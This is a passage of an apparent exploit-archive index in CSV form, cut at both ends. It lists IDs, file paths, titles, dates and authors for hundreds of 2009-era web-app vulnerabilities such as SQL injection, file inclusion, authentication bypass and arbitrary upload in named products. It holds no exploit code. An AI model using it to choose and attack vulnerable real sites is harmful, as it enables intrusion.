'id' SQL Injection",2009-07-28,MizoZ,php,webapps, -9289,exploits/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps, -9290,exploits/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps, -9292,exploits/php/webapps/9292.txt,"PaoLink 1.0 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,php,webapps, -9293,exploits/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,php,webapps, -9294,exploits/php/webapps/9294.txt,"PaoLiber 1.1 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,php,webapps, -9296,exploits/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps, -9297,exploits/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,php,webapps, -9307,exploits/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 - 'readfile()' Local File Disclosure",2009-07-30,GoLd_M,php,webapps, -9308,exploits/php/webapps/9308.txt,"justVisual 1.2 - 'fs_jVroot' Remote File Inclusion",2009-07-30,SirGod,php,webapps, -9309,exploits/php/webapps/9309.txt,"Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection",2009-07-30,SirGod,php,webapps, -9310,exploits/php/webapps/9310.txt,"dit.cms 1.3 - 'path/sitemap/relPath' Local File Inclusion",2009-07-30,SirGod,php,webapps, -9311,exploits/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,php,webapps, -9312,exploits/php/webapps/9312.txt,"d.net CMS - Local File Inclusion / SQL Injection",2009-07-30,SirGod,php,webapps, -9313,exploits/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Local File Inclusion",2009-07-30,SirGod,php,webapps, -9314,exploits/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps, -9315,exploits/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps, -9316,exploits/php/webapps/9316.txt,"linkSpheric 0.74b6 - 'listID' SQL Injection",2009-07-30,NoGe,php,webapps, -9320,exploits/php/webapps/9320.php,"Arab Portal 2.x - 'forum.php' SQL Injection",2009-08-01,rEcruit,php,webapps, -9322,exploits/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusions",2009-08-01,NoGe,php,webapps, -9324,exploits/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps, -9325,exploits/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps, -9326,exploits/php/webapps/9326.txt,"aa33code 0.0.1 - Local File Inclusion / Authentication Bypass / File Disclosure",2009-08-01,SirGod,php,webapps, -9327,exploits/php/webapps/9327.txt,"Mobilelib Gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps, -9328,exploits/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps, -9331,exploits/php/webapps/9331.txt,"ProjectButler 1.5.0 - 'pda_projects.php?offset' Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps, -9332,exploits/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps, -9333,exploits/php/webapps/9333.txt,"Netpet CMS 1.9 - 'confirm.php?language' Local File Inclusion",2009-08-03,SirGod,php,webapps, -9334,exploits/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,php,webapps, -9335,exploits/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps, -9336,exploits/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps, -9337,exploits/php/webapps/9337.txt,"simplePHPWeb 0.2 - 'files.php' Authentication Bypass",2009-08-03,SirGod,php,webapps, -9338,exploits/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps, -9339,exploits/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps, -9340,exploits/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps, -9341,exploits/php/webapps/9341.txt,"Questions Answered 1.3 - Authentication Bypass",2009-08-03,snakespc,php,webapps, -9342,exploits/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps, -9344,exploits/php/webapps/9344.txt,"Multi Website 1.5 - index PHP action SQL Injection",2009-08-03,SarBoT511,php,webapps, -9347,exploits/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps, -9348,exploits/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",php,webapps, -9349,exploits/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - 'index.php?more' SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps, -9350,exploits/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps, -9351,exploits/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps, -9353,exploits/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,php,webapps, -9355,exploits/php/webapps/9355.txt,"elgg 1.5 - '/_css/js.php' Local File Inclusion",2009-08-04,eLwaux,php,webapps, -9356,exploits/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps, -9357,exploits/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps, -9358,exploits/php/webapps/9358.txt,"In-portal 4.3.1 - 'index.php?env' Local File Inclusion",2009-08-04,"Angela Chang",php,webapps, -9365,exploits/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps, -9367,exploits/php/webapps/9367.txt,"tenrok 1.1.0 - File Disclosure / Remote Code Execution",2009-08-05,SirGod,php,webapps, -9369,exploits/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,php,webapps, -9370,exploits/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting",2009-08-05,Moudi,php,webapps, -9371,exploits/php/webapps/9371.txt,"opennews 1.0 - SQL Injection / Remote Code Execution",2009-08-05,SirGod,php,webapps, -9372,exploits/php/webapps/9372.txt,"Portel 2008 - 'decide.php?patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps, -9378,exploits/php/webapps/9378.txt,"PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting",2009-08-06,int_main();,php,webapps, -9380,exploits/php/webapps/9380.txt,"TYPO3 CMS 4.0 - 'showUid' SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps, -9383,exploits/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps, -9384,exploits/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps, -9385,exploits/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps, -9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",php,webapps, -9389,exploits/php/webapps/9389.txt,"Logoshows BBS 2.0 - 'forumid' SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps, -9390,exploits/php/webapps/9390.txt,"Typing Pal 1.0 - 'idTableProduit' SQL Injection",2009-08-07,Red-D3v1L,php,webapps, -9394,exploits/php/webapps/9394.pl,"Arab Portal 2.2 - Blind Cookie Authentication Bypass",2009-08-07,"Jafer Al Zidjali",php,webapps, -9395,exploits/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps, -9396,exploits/php/webapps/9396.txt,"Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,php,webapps, -9397,exploits/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,php,webapps, -9398,exploits/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - 'Ignore-List' SQL Injection",2009-08-07,M4dhead,php,webapps, -9399,exploits/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,php,webapps, -9400,exploits/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps, -9404,exploits/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,php,webapps, -9405,exploits/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps, -9406,exploits/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,php,webapps, -9407,exploits/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps, -9408,exploits/php/webapps/9408.php,"Joomla! Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",php,webapps, -9410,exploits/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié",php,webapps, -9413,exploits/php/webapps/9413.txt,"Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps, -9416,exploits/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - 'systemid' SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps, -9419,exploits/php/webapps/9419.txt,"Shorty 0.7.1b - (Authentication Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps, -9421,exploits/php/webapps/9421.txt,"Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps, -9424,exploits/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injections",2009-08-12,"Sense of Security",php,webapps, -9425,exploits/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution",2009-08-12,IHTeam,php,webapps, -9430,exploits/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup",2009-08-13,Ams,php,webapps, -9431,exploits/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps, -9433,exploits/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps, -9434,exploits/php/webapps/9434.txt,"tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure",2009-08-13,[]ViZiOn,php,webapps, -9437,exploits/php/webapps/9437.txt,"Ignition 1.2 - 'comment' Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps, -9438,exploits/php/webapps/9438.txt,"PHP Competition System 0.84 - 'competition' SQL Injection",2009-08-14,Mr.SQL,php,webapps, -9440,exploits/php/webapps/9440.txt,"DS CMS 1.0 - 'nFileId' SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps, -9441,exploits/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps, -9444,exploits/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusions",2009-08-18,jetli007,php,webapps, -9445,exploits/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps, -9447,exploits/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' SQL Injection",2009-08-18,NoGe,php,webapps, -9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,php,webapps, -9450,exploits/php/webapps/9450.txt,"vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps, -9451,exploits/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' SQL Injection",2009-08-18,Mr.SQL,php,webapps, -9452,exploits/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps, -9453,exploits/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,php,webapps, -9459,exploits/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps, -9460,exploits/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps, -9461,exploits/php/webapps/9461.txt,"E CMS 1.0 - 'index.php?s' SQL Injection",2009-08-18,Red-D3v1L,php,webapps, -9462,exploits/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,php,webapps, -9463,exploits/php/webapps/9463.php,"Joomla! Component MisterEstate - Blind SQL Injection",2009-08-18,jdc,php,webapps, -9464,exploits/php/webapps/9464.txt,"Fotoshow PRO - 'category' SQL Injection",2009-08-18,darkmasking,php,webapps, -9465,exploits/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,php,webapps, -9469,exploits/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps, -9470,exploits/php/webapps/9470.txt,"PHP Email Manager - 'remove.php?ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps, -9471,exploits/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps, -9472,exploits/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,php,webapps, -9474,exploits/php/webapps/9474.rb,"Traidnt UP 2.0 - SQL Injection",2009-08-18,"Jafer Al Zidjali",php,webapps, -9475,exploits/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps, -9481,exploits/php/webapps/9481.txt,"Moa Gallery 1.1.0 - 'gallery_id' SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps, -9482,exploits/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps, -9484,exploits/php/webapps/9484.txt,"PHP Dir Submit - 'aid' SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps, -9485,exploits/php/webapps/9485.txt,"Cuteflow 2.10.3 - 'edituser.php' Security Bypass",2009-08-24,"Hever Costa Rocha",php,webapps, -9490,exploits/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps, -9491,exploits/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps, -9493,exploits/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps, -9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps, -9497,exploits/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps, -9499,exploits/php/webapps/9499.txt,"New5starRating 1.0 - 'rating.php' SQL Injection",2009-08-24,Bgh7,php,webapps, -9502,exploits/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - 'testimID' SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps, -9504,exploits/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - 'season' Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps, -9505,exploits/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps, -9510,exploits/php/webapps/9510.txt,"Joomla! Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,php,webapps, -9511,exploits/php/webapps/9511.txt,"Turnkey Arcade Script - SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps, -9512,exploits/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps, -40383,exploits/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80 -9518,exploits/php/webapps/9518.txt,"EMO Breader Manager - 'video.php?movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps, -9522,exploits/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusions",2009-08-26,cr4wl3r,php,webapps, -9523,exploits/php/webapps/9523.txt,"Moa Gallery 1.2.0 - 'index.php?action' SQL Injection",2009-08-26,Mr.SQL,php,webapps, -9524,exploits/php/webapps/9524.txt,"totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion",2009-08-26,Moudi,php,webapps, -9525,exploits/php/webapps/9525.txt,"Moa Gallery 1.2.0 - 'p_filename' Remote File Disclosure",2009-08-26,GoLd_M,php,webapps, -9527,exploits/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' SQL Injection",2009-08-26,Red-D3v1L,php,webapps, -9529,exploits/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - 'fmid' SQL Injection",2009-08-26,ZhaoHuAn,php,webapps, -9530,exploits/php/webapps/9530.txt,"Open Auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps, -9531,exploits/php/webapps/9531.txt,"PAD Site Scripts 3.6 - 'list.php?string' SQL Injection",2009-08-26,Mr.SQL,php,webapps, -9532,exploits/php/webapps/9532.txt,"allomani 2007 - 'cat' SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps, -9533,exploits/php/webapps/9533.txt,"PHPSANE 0.5.0 - 'save.php' Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps, -9534,exploits/php/webapps/9534.txt,"Joomla! Component com_digifolio 1.52 - 'id' SQL Injection",2009-08-27,v3n0m,php,webapps, -9535,exploits/php/webapps/9535.txt,"Uiga Church Portal - 'year' SQL Injection",2009-08-27,Mr.SQL,php,webapps, -9538,exploits/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps, -9544,exploits/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php?s' SQL Injection",2009-08-31,Red-D3v1L,php,webapps, -9552,exploits/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php?op' SQL Injection",2009-08-31,Mr.SQL,php,webapps, -9553,exploits/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (1)",2009-08-31,Affix,php,webapps, -9555,exploits/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps, -9556,exploits/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps, -9562,exploits/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure",2009-09-01,"SEC Consult",asp,webapps, -9563,exploits/php/webapps/9563.txt,"Joomla! Component com_artportal 1.0 - 'portalid' SQL Injection",2009-09-01,"599eme Man",php,webapps, -9564,exploits/php/webapps/9564.txt,"Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion",2009-09-01,ByALBAYX,php,webapps, -9565,exploits/php/webapps/9565.txt,"Xstate Real Estate 1.0 - Blind SQL Injection / Cross-Site Scripting",2009-09-01,Moudi,php,webapps, -9566,exploits/php/webapps/9566.txt,"KingCMS 0.6.0 - 'menu.php' Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps, -9569,exploits/php/webapps/9569.txt,"phpBB3 - addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,php,webapps, -9570,exploits/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - 'debug_PHP.php' Local File Inclusion",2009-09-01,CoBRa_21,php,webapps, -9571,exploits/php/webapps/9571.txt,"Joomla! Component com_gameserver 1.0 - 'id' SQL Injection",2009-09-01,v3n0m,php,webapps, -9572,exploits/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps, -9576,exploits/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,php,webapps, -9577,exploits/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - 'highlighter' Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps, -9578,exploits/php/webapps/9578.txt,"PHP Live! 3.3 - 'deptid' SQL Injection",2009-09-02,v3n0m,php,webapps, -9582,exploits/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,php,webapps, -9583,exploits/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,php,webapps, -9588,exploits/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps, -9590,exploits/php/webapps/9590.c,"ZeroBoard 4.1 pl7 - 'now_connect()' Remote Code Execution",2009-09-04,SpeeDr00t,php,webapps, -9591,exploits/php/webapps/9591.txt,"Ticket Support Script - 'ticket.php' Arbitrary File Upload",2009-09-04,InjEctOr5,php,webapps, -9593,exploits/php/webapps/9593.txt,"Joomla! Component com_Joomlaub - 'aid' SQL Injection",2009-09-04,"599eme Man",php,webapps, -9599,exploits/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload",2009-09-09,Securitylab.ir,php,webapps, -9600,exploits/php/webapps/9600.txt,"OBOphiX 2.7.0 - 'fonctions_racine.php' Remote File Inclusion",2009-09-09,"EA Ngel",php,webapps, -9601,exploits/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps, -9602,exploits/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps, -9603,exploits/php/webapps/9603.txt,"Model Agency Manager Pro - 'user_id' SQL Injection",2009-09-09,R3d-D3V!L,php,webapps, -9604,exploits/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps, -9605,exploits/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps, -9609,exploits/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps, -9611,exploits/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps, -9612,exploits/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps, -9623,exploits/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusions",2009-09-10,Kurd-Team,php,webapps, -9625,exploits/php/webapps/9625.txt,"nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting",2009-09-10,"Salvatore Fresta",php,webapps, -9629,exploits/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps, -9630,exploits/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,php,webapps, -9631,exploits/php/webapps/9631.txt,"iDesk - 'download.php?cat_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps, -9632,exploits/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - 'hotel_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps, -9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps, -9634,exploits/php/webapps/9634.txt,"Adult Portal escort listing - 'user_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps, -9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps, -9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps, -9637,exploits/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injections",2009-09-10,"Salvatore Fresta",php,webapps, -9639,exploits/php/webapps/9639.txt,"Image voting 1.0 - 'index.php?show' SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps, -9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,php,webapps, -9647,exploits/php/webapps/9647.txt,"PHP-IPNMonitor - 'maincat_id' SQL Injection",2009-09-11,noname,php,webapps, -9648,exploits/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection",2009-09-11,K-159,php,webapps, -9653,exploits/php/webapps/9653.txt,"Joomla! Component Turtushout 0.11 - 'Name' SQL Injection",2009-09-14,jdc,php,webapps, -9654,exploits/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps, -9656,exploits/php/webapps/9656.txt,"Aurora CMS 1.0.2 - 'install.plugin.php' Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps, -9665,exploits/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps, -9669,exploits/php/webapps/9669.txt,"Bs Counter 2.5.3 - 'page' SQL Injection",2009-09-14,Bgh7,php,webapps, -9674,exploits/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,php,webapps, -9675,exploits/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp?PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps, -9681,exploits/php/webapps/9681.txt,"efront 3.5.4 - 'database.php?path' Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps, -9692,exploits/php/webapps/9692.txt,"iBoutique.MALL 1.2 - 'cat' Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps, -9693,exploits/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps, -9696,exploits/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,php,webapps, -9697,exploits/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps, -9698,exploits/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps, -9699,exploits/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps, -9700,exploits/php/webapps/9700.rb,"SaphpLesson 4.3 - Blind SQL Injection",2009-09-16,"Jafer Al Zidjali",php,webapps, -9702,exploits/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - 'platform' SQL Injection",2009-09-16,snakespc,php,webapps, -9703,exploits/php/webapps/9703.txt,"phpPollScript 1.3 - 'include_class' Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps, -9706,exploits/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps, -9708,exploits/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps, -9710,exploits/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",php,webapps, -9711,exploits/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps, -9712,exploits/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps, -9713,exploits/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps, -9714,exploits/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps, -9715,exploits/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps, -9716,exploits/multiple/webapps/9716.txt,"Network 